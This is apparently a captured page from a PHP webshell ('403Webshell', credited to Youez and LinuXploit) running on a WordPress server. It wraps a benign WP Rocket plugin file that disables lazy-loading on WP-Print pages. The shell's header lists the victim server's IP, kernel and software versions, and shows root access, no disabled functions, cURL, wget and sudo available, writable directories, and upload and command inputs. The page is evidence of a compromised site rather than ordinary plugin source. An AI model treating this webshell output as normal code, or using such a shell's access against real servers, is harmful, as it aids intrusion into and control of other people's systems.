403Webshell
Server IP : 14.225.204.176  /  Your IP : 216.73.216.6
Web Server : nginx/1.24.0
System : Linux nodejs-ybgk 6.8.0-40-generic #40-Ubuntu SMP PREEMPT_DYNAMIC Fri Jul 5 10:34:03 UTC 2024 x86_64
User : root ( 0)
PHP Version : 8.1.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/php/zinisoft.net/wp-content/plugins/wp-rocket/inc/3rd-party/plugins/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/php/zinisoft.net/wp-content/plugins/wp-rocket/inc/3rd-party/plugins/wp-print.php
<?php

defined( 'ABSPATH' ) || exit;

if ( function_exists( 'print_link' ) ) :
	/**
	 * Conflict with WP-Print: don't apply LazyLoad on print pages
	 *
	 * @since 2.6.8
	 */
	function rocket_deactivate_lazyload_on_print_pages() {
		global $wp_query;

		if ( isset( $wp_query->query_vars['print'] ) ) {
			add_filter( 'do_rocket_lazyload', '__return_false' );
		}
	}
	add_action( 'wp', 'rocket_deactivate_lazyload_on_print_pages' );
endif;

Youez - 2016 - github.com/yon3zu
LinuXploit